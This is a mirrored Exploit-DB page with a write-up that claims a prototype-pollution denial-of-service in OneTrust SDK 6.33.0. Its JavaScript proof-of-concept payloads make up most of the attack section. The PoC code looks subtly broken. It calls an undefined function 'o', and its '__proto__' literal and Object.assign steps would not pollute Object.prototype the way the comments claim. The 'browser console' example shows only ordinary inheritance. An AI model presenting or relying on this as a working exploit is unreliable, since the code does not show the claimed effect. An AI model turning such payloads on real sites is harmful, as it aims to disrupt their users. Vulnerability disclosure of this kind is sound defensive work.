bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/linux/remote/52340.txt
Exploit-DB 97a1ee1350 DB: 2025-06-27 
9 changes to exploits/shellcodes/ghdb

OneTrust SDK 6.33.0 - Denial Of Service (DoS)

McAfee Agent 5.7.6 - Insecure Storage of Sensitive Information

PX4 Military UAV Autopilot 1.12.3 - Denial of Service (DoS)

Pterodactyl Panel 1.11.11 - Remote Code Execution (RCE)

Sitecore 10.4 - Remote Code Execution (RCE)

Social Warfare WordPress Plugin 3.5.2 - Remote Code Execution (RCE)

freeSSHd 1.0.9 - Denial of Service (DoS)

Microsoft Excel 2024 Use after free - Remote Code Execution (RCE)
2025-06-27 00:16:32 +00:00

84 lines
No EOL
2.5 KiB
Text
Raw Permalink Blame History

- **Exploit Title**: OneTrust SDK 6.33.0 - Denial Of Service (DoS)
- **Date**: 01/01/2025
- **Exploit Author**: Alameen Karim Merali
- **Vendor Homepage**: [OneTrust JavaScript API](https://developer.onetrust.com/onetrust/docs/javascript-api)
- **Software Link**: [otBannerSdk.js v6.33.0](https://discord.com/assets/oneTrust/v4/scripttemplates/6.33.0/otBannerSdk.js)
- **Version**: 6.33.0
- **Tested on**: Kali Linux
- **CVE ID**: CVE-2024-57708
## Vulnerability Summary
A vulnerability exists in **OneTrust SDK v6.33.0** that allows an attacker to perform **Prototype Pollution** via the misuse of `Object.setPrototypeOf` and `Object.assign`. An attacker can inject malicious properties into the prototype chain, potentially causing **Denial of Service (DoS)** or altering the behavior of inherited objects throughout the application.
## Technical Details
The affected code includes prototype assignment logic such as:
```javascript
var o = function(e, t) {
return (o = Object.setPrototypeOf || { __proto__: [] } instanceof ...);
};
```
If the `t` argument (a user-supplied object) contains a `__proto__` or `constructor.prototype` reference, it can pollute `Object.prototype` globally.
## Proof-of-Concept (PoC)
```javascript
function testPrototypePollution() {
const maliciousPayload = {
"__proto__": {
polluted: "yes"
}
};
// Using vulnerable function 'o'
try {
o({}, maliciousPayload);
console.log("After o:", {}.polluted); // "yes"
} catch (e) {
console.error("Error testing o:", e);
}
// Using Object.assign
try {
Object.assign({}, maliciousPayload);
console.log("After Object.assign:", {}.polluted); // "yes"
} catch (e) {
console.error("Error testing Object.assign:", e);
}
// Cleanup
delete Object.prototype.polluted;
}
testPrototypePollution();
```
## Browser Console PoC (DevTools)
```javascript
var maliciousObj = { __proto__: { hacked: true } };
var newObj = Object.create(maliciousObj);
console.log(newObj.hacked); // true
```
Screenshot: [PoC Screenshot](https://ibb.co/B2hyYr5v)
## Steps to Reproduce
1. Save the PoC script above as `exploit.js`
2. Run using Node.js: `node exploit.js`
3. Observe polluted output (`{}.polluted === "yes"`)
4. Alternatively, run the payload in browser DevTools
## Impact
- Global object pollution
- Application logic errors
- Potential DoS
- Further exploitation depending on context
## Recommendation
Developers should upgrade to a patched version and sanitize any user input used in object merging or prototype manipulation.
Reference in a new issue View git blame Copy permalink